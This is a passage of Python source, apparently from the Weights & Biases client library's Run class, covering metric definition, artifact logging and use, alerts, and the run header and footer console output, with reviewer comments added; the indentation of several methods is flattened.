        # Only a trailing-glob is allowed, e.g. "train/*"; reject inner "*".
        stripped = name[:-1] if name.endswith("*") else name
        if "*" in stripped:
            raise wandb.Error(
                "Unhandled define_metric() arg: name (glob suffixes only): {}".format(
                    name
                )
            )
        summary_ops: Optional[Sequence[str]] = None
        if summary:
            # "min,max" style comma-separated list, case-insensitive.
            summary_items = [s.lower() for s in summary.split(",")]
            summary_ops = []
            valid = {"min", "max", "mean", "best", "last", "copy", "none"}
            for i in summary_items:
                if i not in valid:
                    raise wandb.Error(
                        "Unhandled define_metric() arg: summary op: {}".format(i)
                    )
                summary_ops.append(i)
        goal_cleaned: Optional[str] = None
        if goal is not None:
            # Normalize "minimize"/"maximize" (or any prefix) to "min"/"max".
            goal_cleaned = goal[:3].lower()
            valid_goal = {"min", "max"}
            if goal_cleaned not in valid_goal:
                raise wandb.Error(
                    "Unhandled define_metric() arg: goal: {}".format(goal)
                )
        m = wandb_metric.Metric(
            name=name,
            step_metric=step_metric,
            step_sync=step_sync,
            summary=summary_ops,
            hidden=hidden,
            goal=goal_cleaned,
            overwrite=overwrite,
        )
        m._set_callback(self._metric_callback)
        # Push the metric definition to the backend immediately.
        m._commit()
        with telemetry.context(run=self) as tel:
            tel.feature.metric = True
        return m
    # TODO(jhr): annotate this
    def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None, log_graph=False) -> None:  # type: ignore
        """Pass-through to the module-level `wandb.watch` (model instrumentation)."""
        wandb.watch(models, criterion, log, log_freq, idx, log_graph)
    # TODO(jhr): annotate this
    def unwatch(self, models=None) -> None:  # type: ignore
        """Pass-through to the module-level `wandb.unwatch` (remove model hooks)."""
        wandb.unwatch(models=models)
    def _swap_artifact_name(self, artifact_name: str, use_as: Optional[str]) -> str:
        """Map an artifact reference to a launch-config replacement, if any.

        Lookup order: (1) exact match on `use_as` or `artifact_name` in the
        launch artifact mapping; (2) when no `use_as` was given, a fallback
        lookup by the artifact's sequence name among uniquely-named launch
        artifacts; (3) otherwise the original `artifact_name` is returned
        unchanged (with a warning).

        Raises:
            ValueError: if a mapping entry is missing name/entity/project.
        """
        artifact_key_string = use_as or artifact_name
        replacement_artifact_info = self._launch_artifact_mapping.get(
            artifact_key_string
        )
        if replacement_artifact_info is not None:
            new_name = replacement_artifact_info.get("name")
            entity = replacement_artifact_info.get("entity")
            project = replacement_artifact_info.get("project")
            if new_name is None or entity is None or project is None:
                raise ValueError(
                    "Misconfigured artifact in launch config. Must include name, project and entity keys."
                )
            return f"{entity}/{project}/{new_name}"
        elif replacement_artifact_info is None and use_as is None:
            # No direct mapping: fall back to matching by sequence name
            # (the part before ":" and after the last "/").
            wandb.termwarn(
                f"Could not find {artifact_name} in launch artifact mapping. Searching for unique artifacts with sequence name: {artifact_name}"
            )
            sequence_name = artifact_name.split(":")[0].split("/")[-1]
            unique_artifact_replacement_info = self._unique_launch_artifact_sequence_names.get(
                sequence_name
            )
            if unique_artifact_replacement_info is not None:
                new_name = unique_artifact_replacement_info.get("name")
                entity = unique_artifact_replacement_info.get("entity")
                project = unique_artifact_replacement_info.get("project")
                if new_name is None or entity is None or project is None:
                    raise ValueError(
                        "Misconfigured artifact in launch config. Must include name, project and entity keys."
                    )
                return f"{entity}/{project}/{new_name}"
        else:
            # use_as was given but had no mapping entry.
            wandb.termwarn(
                f"Could not find swappable artifact at key: {use_as}. Using {artifact_name}"
            )
            return artifact_name
        # Fallthrough: sequence-name lookup also failed.
        wandb.termwarn(
            f"Could not find {artifact_key_string} in launch artifact mapping. Using {artifact_name}"
        )
        return artifact_name
    def _detach(self) -> None:
        # Intentional no-op here; presumably a hook point for attach/detach
        # flows implemented elsewhere — confirm against callers.
        pass
    def use_artifact(
        self,
        artifact_or_name: Union[str, public.Artifact, Artifact],
        type: Optional[str] = None,
        aliases: Optional[List[str]] = None,
        use_as: Optional[str] = None,
    ) -> Union[public.Artifact, Artifact]:
        """Declare an artifact as an input to a run.

        Call `download` or `file` on the returned object to get the contents locally.

        Arguments:
            artifact_or_name: (str or Artifact) An artifact name.
                May be prefixed with entity/project/. Valid names
                can be in the following forms:
                    - name:version
                    - name:alias
                    - digest
                You can also pass an Artifact object created by calling `wandb.Artifact`
            type: (str, optional) The type of artifact to use.
            aliases: (list, optional) Aliases to apply to this artifact
            use_as: (string, optional) Optional string indicating what purpose the artifact was used with.
                Will be shown in UI.

        Returns:
            An `Artifact` object.

        Raises:
            TypeError: when the run is offline.
            ValueError: on a type mismatch, an invalid/reused `use_as` slot,
                or an unsupported `artifact_or_name` value.
        """
        if self.offline:
            raise TypeError("Cannot use artifact when in offline mode.")
        r = self._run_obj
        assert r is not None
        api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
        api.set_current_run_id(self.id)
        if isinstance(artifact_or_name, str):
            # Name lookup path: optionally rewritten by the launch mapping,
            # then resolved through the public API.
            if self._launch_artifact_mapping:
                name = self._swap_artifact_name(artifact_or_name, use_as)
            else:
                name = artifact_or_name
            public_api = self._public_api()
            artifact = public_api.artifact(type=type, name=name)
            if type is not None and type != artifact.type:
                raise ValueError(
                    "Supplied type {} does not match type {} of artifact {}".format(
                        type, artifact.type, artifact.name
                    )
                )
            artifact._use_as = use_as or artifact_or_name
            if use_as:
                # A use_as slot may only ever be bound to a single artifact.
                if (
                    use_as in self._used_artifact_slots.keys()
                    and self._used_artifact_slots[use_as] != artifact.id
                ):
                    raise ValueError(
                        "Cannot call use_artifact with the same use_as argument more than once"
                    )
                elif ":" in use_as or "/" in use_as:
                    raise ValueError(
                        "use_as cannot contain special characters ':' or '/'"
                    )
                self._used_artifact_slots[use_as] = artifact.id
            api.use_artifact(
                artifact.id, use_as=use_as or artifact_or_name,
            )
            return artifact
        else:
            artifact = artifact_or_name
            if aliases is None:
                aliases = []
            elif isinstance(aliases, str):
                aliases = [aliases]
            if isinstance(artifact_or_name, wandb.Artifact):
                # A locally-constructed artifact must be logged first, then
                # waited on so it has a server-side identity.
                if use_as is not None:
                    wandb.termwarn(
                        "Indicating use_as is not supported when using an artifact with an instance of `wandb.Artifact`"
                    )
                self._log_artifact(
                    artifact,
                    aliases=aliases,
                    is_user_created=True,
                    use_after_commit=True,
                )
                artifact.wait()
                artifact._use_as = use_as or artifact.name
                return artifact
            elif isinstance(artifact, public.Artifact):
                if (
                    self._launch_artifact_mapping
                    and artifact.name in self._launch_artifact_mapping.keys()
                ):
                    wandb.termwarn(
                        "Swapping artifacts is not supported when using an instance of `public.Artifact`. "
                        f"Using {artifact.name}."
                    )
                artifact._use_as = use_as or artifact.name
                api.use_artifact(
                    artifact.id, use_as=use_as or artifact._use_as or artifact.name
                )
                return artifact
            else:
                raise ValueError(
                    'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), '
                    "an instance of `wandb.Artifact`, or `wandb.Api().artifact()` to `use_artifact`"  # noqa: E501
                )
def log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> wandb_artifacts.Artifact:
"""Declare an artifact as an output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(
artifact_or_path, name=name, type=type, aliases=aliases
)
def upsert_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Declare (or append to) a non-finalized artifact as output of a run.
Note that you must call run.finish_artifact() to finalize the artifact.
This is useful when distributed jobs need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name=name,
type=type,
aliases=aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Finishes a non-finalized artifact as output of a run.
Subsequent "upserts" with the same distributed ID will result in a new version.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
    self,
    artifact_or_path: Union[wandb_artifacts.Artifact, str],
    name: Optional[str] = None,
    type: Optional[str] = None,
    aliases: Optional[List[str]] = None,
    distributed_id: Optional[str] = None,
    finalize: bool = True,
    is_user_created: bool = False,
    use_after_commit: bool = False,
) -> wandb_artifacts.Artifact:
    """Shared implementation behind log/upsert/finish artifact methods.

    Normalizes the input into an Artifact, validates aliases and type, and
    publishes it through the backend interface.  Online, the server-side
    result is exposed lazily via ``artifact._logged_artifact``.
    """
    api = internal.Api()
    if api.settings().get("anonymous") == "true":
        wandb.termwarn(
            "Artifacts logged anonymously cannot be claimed and expire after 7 days."
        )
    # A non-finalized ("upserted") artifact only makes sense as part of a
    # distributed group, so distributed_id is mandatory in that case.
    if not finalize and distributed_id is None:
        raise TypeError("Must provide distributed_id if artifact is not finalize")
    if aliases is not None:
        # "/" and ":" are reserved separators in artifact identifiers.
        if any(invalid in alias for alias in aliases for invalid in ["/", ":"]):
            raise ValueError(
                "Aliases must not contain any of the following characters: /, :"
            )
    artifact, aliases = self._prepare_artifact(
        artifact_or_path, name, type, aliases
    )
    artifact.distributed_id = distributed_id
    # Fail fast if the artifact's type clashes with the server-side record.
    self._assert_can_log_artifact(artifact)
    if self._backend and self._backend.interface:
        if not self._settings._offline:
            # Online path: asynchronous round-trip; wrap the future so
            # callers can .wait() on the logged artifact.
            future = self._backend.interface.communicate_artifact(
                self,
                artifact,
                aliases,
                finalize=finalize,
                is_user_created=is_user_created,
                use_after_commit=use_after_commit,
            )
            artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
        else:
            # Offline path: fire-and-forget publish, synced later.
            self._backend.interface.publish_artifact(
                self,
                artifact,
                aliases,
                finalize=finalize,
                is_user_created=is_user_created,
                use_after_commit=use_after_commit,
            )
    elif self._internal_run_interface:
        # Internal-process path (no full backend attached).
        self._internal_run_interface.publish_artifact(
            self,
            artifact,
            aliases,
            finalize=finalize,
            is_user_created=is_user_created,
            use_after_commit=use_after_commit,
        )
    return artifact
def _public_api(self, overrides: Optional[Dict[str, str]] = None) -> PublicApi:
    """Build a public-API client scoped to this run.

    Bug fix: ``overrides`` was previously ignored — the parameter was
    immediately clobbered by a fresh ``{"run": self.id}`` dict.  Caller
    supplied overrides are now honored, with run/entity/project written
    on top (run-derived values keep precedence, matching the original
    unconditional assignments).
    """
    merged: Dict[str, str] = dict(overrides) if overrides else {}
    merged["run"] = self.id
    run_obj = self._run_obj
    if run_obj is not None:
        merged["entity"] = run_obj.entity
        merged["project"] = run_obj.project
    return public.Api(merged)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact) -> None:  # type: ignore
    """Best-effort check that ``artifact.type`` matches the server's record.

    Only runs online; network failures are deliberately swallowed because
    this is an early-warning check, not a requirement for valid operation.
    """
    if not self._settings._offline:
        try:
            public_api = self._public_api()
            expected_type = public.Artifact.expected_type(
                public_api.client,
                artifact.name,
                public_api.settings["entity"],
                public_api.settings["project"],
            )
        except requests.exceptions.RequestException:
            # Just return early if there is a network error. This is
            # ok, as this function is intended to help catch an invalid
            # type early, but not a hard requirement for valid operation.
            return
        if expected_type is not None and artifact.type != expected_type:
            raise ValueError(
                "Expected artifact type {}, got {}".format(
                    expected_type, artifact.type
                )
            )
def _prepare_artifact(
    self,
    artifact_or_path: Union[wandb_artifacts.Artifact, str],
    name: Optional[str] = None,
    type: Optional[str] = None,
    aliases: Optional[List[str]] = None,
) -> Tuple[wandb_artifacts.Artifact, List[str]]:
    """Normalize user input into a finalized Artifact plus an alias list.

    A string path is wrapped in a new Artifact (file, directory, or
    "scheme://" external reference); an Artifact instance is used as-is.
    """
    aliases = aliases or ["latest"]
    if isinstance(artifact_or_path, str):
        if name is None:
            # Default name: "run-<run id>-<path basename>".
            name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
        artifact = wandb.Artifact(name, type)
        if os.path.isfile(artifact_or_path):
            artifact.add_file(artifact_or_path)
        elif os.path.isdir(artifact_or_path):
            artifact.add_dir(artifact_or_path)
        elif "://" in artifact_or_path:
            artifact.add_reference(artifact_or_path)
        else:
            # NOTE(review): message is missing a space between "external"
            # and "reference" (kept byte-identical here).
            raise ValueError(
                "path must be a file, directory or external"
                "reference like s3://bucket/path"
            )
    else:
        artifact = artifact_or_path
    if not isinstance(artifact, wandb.Artifact):
        raise ValueError(
            "You must pass an instance of wandb.Artifact or a "
            "valid file path to log_artifact"
        )
    if isinstance(aliases, str):
        # Tolerate a bare string alias.
        aliases = [aliases]
    artifact.finalize()
    return artifact, aliases
def alert(
    self,
    title: str,
    text: str,
    level: Union[str, "AlertLevel"] = None,
    wait_duration: Union[int, float, timedelta, None] = None,
) -> None:
    """Launch an alert with the given title and text.

    Arguments:
        title: (str) The title of the alert, must be less than 64 characters long.
        text: (str) The text body of the alert.
        level: (str or wandb.AlertLevel, optional) The alert level to use,
            either: `INFO`, `WARN`, or `ERROR`.
        wait_duration: (int, float, or timedelta, optional) The time to wait
            (in seconds) before sending another alert with this title.
    """
    # Normalize the level to its string form and validate it.
    level = level or wandb.AlertLevel.INFO
    if isinstance(level, wandb.AlertLevel):
        level_str: str = level.value
    else:
        level_str = level
    if level_str not in {lev.value for lev in wandb.AlertLevel}:
        raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
    # Normalize the wait duration to whole milliseconds.
    wait_duration = wait_duration or timedelta(minutes=1)
    if isinstance(wait_duration, (int, float)):
        wait_duration = timedelta(seconds=wait_duration)
    elif not callable(getattr(wait_duration, "total_seconds", None)):
        raise ValueError(
            "wait_duration must be an int, float, or datetime.timedelta"
        )
    wait_millis = int(wait_duration.total_seconds() * 1000)
    if self._backend and self._backend.interface:
        self._backend.interface.publish_alert(title, text, level_str, wait_millis)
def __enter__(self) -> "Run":
    # Context-manager entry: `with wandb.init() as run:` binds the run itself.
    return self
def __exit__(
    self,
    exc_type: Type[BaseException],
    exc_val: BaseException,
    exc_tb: TracebackType,
) -> bool:
    # Finish the run: exit code 1 if the `with` body raised, 0 otherwise.
    exit_code = 0 if exc_type is None else 1
    self.finish(exit_code)
    # Returning False on exception lets it propagate to the caller.
    return exc_type is None
def mark_preempting(self) -> None:
    """Marks this run as preempting.

    Also tells the internal process to immediately report this to server.
    """
    # No-op when there is no backend interface (e.g. disabled runs).
    if self._backend and self._backend.interface:
        self._backend.interface.publish_preempting()
# ------------------------------------------------------------------------------
# HEADER
# ------------------------------------------------------------------------------
# Note: All the header methods are static methods since we want to share the printing logic
# with the service execution path that doesn't have access to the run instance
@staticmethod
def _header(
    check_version: Optional["CheckVersionResponse"] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print the run-start banner: version check, wandb version, sync and run info."""
    # printer = printer or get_printer(settings._jupyter)
    Run._header_version_check_info(
        check_version, settings=settings, printer=printer
    )
    Run._header_wandb_version_info(settings=settings, printer=printer)
    Run._header_sync_info(settings=settings, printer=printer)
    Run._header_run_info(settings=settings, printer=printer)
@staticmethod
def _header_version_check_info(
    check_version: Optional["CheckVersionResponse"] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Show delete/yank/upgrade package messages at run start (online only)."""
    if not check_version or settings._offline:
        return
    # printer = printer or get_printer(settings._jupyter)
    if check_version.delete_message:
        printer.display(check_version.delete_message, status="error")
    elif check_version.yank_message:
        printer.display(check_version.yank_message, status="warn")
    # The upgrade hint is emitted unconditionally; `off` suppresses it when
    # there is no upgrade message.
    printer.display(
        check_version.upgrade_message, off=not check_version.upgrade_message
    )
@staticmethod
def _header_wandb_version_info(
    *, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print the client library version unless quiet/silent."""
    if settings.quiet or settings.silent:
        return
    # printer = printer or get_printer(settings._jupyter)
    printer.display(f"Tracking run with wandb version {wandb.__version__}")
@staticmethod
def _header_sync_info(
    *, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Explain where data is synced: offline hint or local sync directory."""
    # printer = printer or get_printer(settings._jupyter)
    if settings._offline:
        printer.display(
            [
                f"W&B syncing is set to {printer.code('`offline`')} in this directory.  ",
                f"Run {printer.code('`wandb online`')} or set {printer.code('WANDB_MODE=online')} "
                "to enable cloud syncing.",
            ]
        )
    else:
        info = [f"Run data is saved locally in {printer.files(settings.sync_dir)}"]
        # The "wandb offline" hint is terminal-only (omitted in notebooks).
        if not printer._html:
            info.append(
                f"Run {printer.code('`wandb offline`')} to turn off syncing."
            )
        printer.display(info, off=settings.quiet or settings.silent)
@staticmethod
def _header_run_info(
    *, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print run/project/sweep links (HTML in notebooks, plain text in terms)."""
    if settings._offline or settings.silent:
        return
    run_url = settings.run_url
    project_url = settings.project_url
    sweep_url = settings.sweep_url
    run_state_str = "Resuming run" if settings.resumed else "Syncing run"
    run_name = settings.run_name
    # printer = printer or get_printer(settings._jupyter)
    if printer._html:
        # Notebook path: only print if the jupyter integration did not
        # already render its own display widget.
        if not wandb.jupyter.maybe_display():
            run_line = f"<strong>{printer.link(run_url, run_name)}</strong>"
            project_line, sweep_line = "", ""
            # TODO(settings): make settings the source of truth
            if not wandb.jupyter.quiet():
                doc_html = printer.link("https://wandb.me/run", "docs")
                project_html = printer.link(project_url, "Weights & Biases")
                project_line = f"to {project_html} ({doc_html})"
                if sweep_url:
                    sweep_line = (
                        f"Sweep page:  {printer.link(sweep_url, sweep_url)}"
                    )
            printer.display(
                [f"{run_state_str} {run_line} {project_line}", sweep_line]
            )
    else:
        # Terminal path.
        printer.display(f"{run_state_str} {printer.name(run_name)}")
        if not settings.quiet:
            printer.display(
                f'{printer.emoji("star")} View project at {printer.link(project_url)}'
            )
            if sweep_url:
                printer.display(
                    f'{printer.emoji("broom")} View sweep at {printer.link(sweep_url)}'
                )
        printer.display(
            f'{printer.emoji("rocket")} View run at {printer.link(run_url)}'
        )
        # TODO(settings) use `wandb_settings` (if self.settings.anonymous == "true":)
        if Api().api.settings().get("anonymous") == "true":
            printer.display(
                "Do NOT share these links with anyone. They can be used to claim your runs.",
                status="warn",
            )
# ------------------------------------------------------------------------------
# FOOTER
# ------------------------------------------------------------------------------
# Note: All the footer methods are static methods since we want to share the printing logic
# with the service execution path that doesn't have access to the run instance
@staticmethod
def _footer(
    sampled_history: Optional["SampledHistoryResponse"] = None,
    final_summary: Optional["GetSummaryResponse"] = None,
    poll_exit_response: Optional[PollExitResponse] = None,
    check_version: Optional["CheckVersionResponse"] = None,
    reporter: Optional[Reporter] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print the run-end summary: history/summary grids, sync status, logs,
    version and local-server warnings, and reporter warnings/errors."""
    Run._footer_history_summary_info(
        history=sampled_history,
        summary=final_summary,
        quiet=quiet,
        settings=settings,
        printer=printer,
    )
    # NOTE(review): keyword is "pool_exit_response" (sic) to match the
    # callee's misspelled parameter name — renaming would break this call.
    Run._footer_sync_info(
        pool_exit_response=poll_exit_response,
        quiet=quiet,
        settings=settings,
        printer=printer,
    )
    Run._footer_log_dir_info(quiet=quiet, settings=settings, printer=printer)
    Run._footer_version_check_info(
        check_version=check_version, quiet=quiet, settings=settings, printer=printer
    )
    Run._footer_local_warn(
        poll_exit_response=poll_exit_response,
        quiet=quiet,
        settings=settings,
        printer=printer,
    )
    Run._footer_reporter_warn_err(
        reporter=reporter, quiet=quiet, settings=settings, printer=printer
    )
@staticmethod
def _footer_exit_status_info(
    exit_code: Optional[int],
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print "Waiting for W&B process to finish..." with success/failure status."""
    if settings.silent:
        return
    status = "(success)." if not exit_code else f"(failed {exit_code})."
    info = [
        f"Waiting for W&B process to finish... {printer.status(status, bool(exit_code))}"
    ]
    # On a failed online run, tell the user how to abort the final sync.
    if not settings._offline and exit_code:
        info.append(f"Press {printer.abort()} to abort syncing.")
    printer.display(f'{" ".join(info)}')
# fixme: Temporary hack until we move to rich which allows multiple spinners
@staticmethod
def _footer_file_pusher_status_info(
    poll_exit_responses: Optional[
        Union[PollExitResponse, Dict[str, Optional[PollExitResponse]]]
    ] = None,
    *,
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Render upload progress for a single run or for a mapping of runs."""
    if not poll_exit_responses:
        return
    if isinstance(poll_exit_responses, PollExitResponse):
        # Single-run form.
        Run._footer_single_run_file_pusher_status_info(
            poll_exit_responses, printer=printer
        )
        return
    if isinstance(poll_exit_responses, dict):
        responses = list(poll_exit_responses.values())
        assert all(
            response is None or isinstance(response, PollExitResponse)
            for response in responses
        )
        if not responses:
            return
        if len(responses) == 1:
            Run._footer_single_run_file_pusher_status_info(
                responses[0], printer=printer
            )
        else:
            Run._footer_multiple_runs_file_pusher_status_info(
                responses, printer=printer
            )
        return
    raise ValueError(
        f"Got the type `{type(poll_exit_responses)}` for `poll_exit_responses`. "
        "Expected either None, PollExitResponse or a Dict[str, Union[PollExitResponse, None]]"
    )
@staticmethod
def _footer_single_run_file_pusher_status_info(
    poll_exit_response: Optional[PollExitResponse] = None,
    *,
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Draw the single-run upload progress bar; close it when done."""
    # todo: is this same as settings._offline?
    if not poll_exit_response:
        return
    progress = poll_exit_response.pusher_stats
    done = poll_exit_response.done
    # megabyte = 2**20 bytes (second entry of the POW_2_BYTES table).
    megabyte = wandb.util.POW_2_BYTES[2][1]
    line = (
        f"{progress.uploaded_bytes / megabyte :.3f} MB of {progress.total_bytes / megabyte:.3f} MB uploaded "
        f"({progress.deduped_bytes / megabyte:.3f} MB deduped)\r"
    )
    # Guard against division by zero when nothing needs uploading.
    percent_done = (
        1.0
        if progress.total_bytes == 0
        else progress.uploaded_bytes / progress.total_bytes
    )
    printer.progress_update(line, percent_done)
    if done:
        printer.progress_close()
        dedupe_fraction = (
            progress.deduped_bytes / float(progress.total_bytes)
            if progress.total_bytes > 0
            else 0
        )
        # Only brag about dedupe savings above 1%.
        if dedupe_fraction > 0.01:
            printer.display(
                f"W&B sync reduced upload amount by {dedupe_fraction * 100:.1f}%             "
            )
@staticmethod
def _footer_multiple_runs_file_pusher_status_info(
    poll_exit_responses: List[Optional[PollExitResponse]],
    *,
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Draw aggregate upload progress across several runs.

    Waits until every response is present (all truthy) before printing.
    """
    # todo: is this same as settings._offline?
    if not all(poll_exit_responses):
        return
    megabyte = wandb.util.POW_2_BYTES[2][1]
    # Total file count across all runs and file categories.
    total_files = sum(
        [
            sum(
                [
                    response.file_counts.wandb_count,
                    response.file_counts.media_count,
                    response.file_counts.artifact_count,
                    response.file_counts.other_count,
                ]
            )
            for response in poll_exit_responses
            if response and response.file_counts
        ]
    )
    uploaded = sum(
        [
            response.pusher_stats.uploaded_bytes
            for response in poll_exit_responses
            if response and response.pusher_stats
        ]
    )
    total = sum(
        [
            response.pusher_stats.total_bytes
            for response in poll_exit_responses
            if response and response.pusher_stats
        ]
    )
    line = f"Processing {len(poll_exit_responses)} runs with {total_files} files ({uploaded/megabyte :.2f} MB/{total/megabyte :.2f} MB)\r"
    # line = "{}{:<71}\r".format(line, " ", max_len=(80 - len(line)))
    printer.progress_update(line)  # type: ignore [call-arg]
    done = all(
        [
            poll_exit_response.done
            for poll_exit_response in poll_exit_responses
            if poll_exit_response
        ]
    )
    if done:
        printer.progress_close()
@staticmethod
def _footer_sync_info(
    pool_exit_response: Optional[PollExitResponse] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print offline sync instructions, or the synced-run summary online.

    NOTE(review): the parameter is spelled "pool_exit_response" (sic);
    callers pass it by keyword, so renaming would be a breaking change.
    """
    if settings.silent:
        return
    # printer = printer or get_printer(settings._jupyter)
    if settings._offline:
        printer.display(
            [
                "You can sync this run to the cloud by running:",
                printer.code(f"wandb sync {settings.sync_dir}"),
            ],
            off=(quiet or settings.quiet),
        )
    else:
        info = [
            f"Synced {printer.name(settings.run_name)}: {printer.link(settings.run_url)}"
        ]
        if pool_exit_response and pool_exit_response.file_counts:
            logger.info("logging synced files")
            file_counts = pool_exit_response.file_counts
            info.append(
                f"Synced {file_counts.wandb_count} W&B file(s), {file_counts.media_count} media file(s), "
                f"{file_counts.artifact_count} artifact file(s) and {file_counts.other_count} other file(s)",
            )
        printer.display(info)
@staticmethod
def _footer_log_dir_info(
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print the directory containing the run's debug logs."""
    if (quiet or settings.quiet) or settings.silent:
        return
    log_dir = settings.log_user or settings.log_internal
    if log_dir:
        # printer = printer or get_printer(settings._jupyter)
        # Show a path relative to the CWD when possible.
        log_dir = os.path.dirname(log_dir.replace(os.getcwd(), "."))
        printer.display(f"Find logs at: {printer.files(log_dir)}",)
@staticmethod
def _footer_history_summary_info(
    history: Optional["SampledHistoryResponse"] = None,
    summary: Optional["GetSummaryResponse"] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Render the "Run history" sparkline grid and "Run summary" grid."""
    if (quiet or settings.quiet) or settings.silent:
        return
    # printer = printer or get_printer(settings._jupyter)
    panel = []
    # Render history if available
    if history:
        logger.info("rendering history")
        # Downsample each metric (non-internal keys only) to <= 40 points.
        sampled_history = {
            item.key: wandb.util.downsample(
                item.values_float or item.values_int, 40
            )
            for item in history.item
            if not item.key.startswith("_")
        }
        history_rows = []
        for key, values in sorted(sampled_history.items()):
            # Skip metrics with non-numeric samples; sparklines need numbers.
            if any((not isinstance(value, numbers.Number) for value in values)):
                continue
            sparkline = printer.sparklines(values)
            if sparkline:
                history_rows.append([key, sparkline])
        if history_rows:
            history_grid = printer.grid(history_rows, "Run history:",)
            panel.append(history_grid)
    # Render summary if available
    if summary:
        final_summary = {
            item.key: json.loads(item.value_json)
            for item in summary.item
            if not item.key.startswith("_")
        }
        logger.info("rendering summary")
        summary_rows = []
        for key, value in sorted(final_summary.items()):
            # arrays etc. might be too large. for now we just don't print them
            if isinstance(value, str):
                # NOTE(review): appends "..." whenever len >= 20, even when
                # len == 20 and nothing was actually cut by the slice.
                value = value[:20] + "..." * (len(value) >= 20)
                summary_rows.append([key, value])
            elif isinstance(value, numbers.Number):
                value = round(value, 5) if isinstance(value, float) else value
                summary_rows.append([key, str(value)])
            else:
                continue
        if summary_rows:
            summary_grid = printer.grid(summary_rows, "Run summary:",)
            panel.append(summary_grid)
    if panel:
        printer.display(printer.panel(panel))
@staticmethod
def _footer_local_warn(
    poll_exit_response: Optional[PollExitResponse] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Warn self-hosted (W&B Local) users when their server is out of date."""
    if (quiet or settings.quiet) or settings.silent:
        return
    if settings._offline:
        return
    if not poll_exit_response or not poll_exit_response.local_info:
        return
    if settings.is_local:
        local_info = poll_exit_response.local_info
        latest_version, out_of_date = local_info.version, local_info.out_of_date
        if out_of_date:
            # printer = printer or get_printer(settings._jupyter)
            printer.display(
                f"Upgrade to the {latest_version} version of W&B Local to get the latest features. "
                f"Learn more: {printer.link('https://wandb.me/local-upgrade')}",
                status="warn",
            )
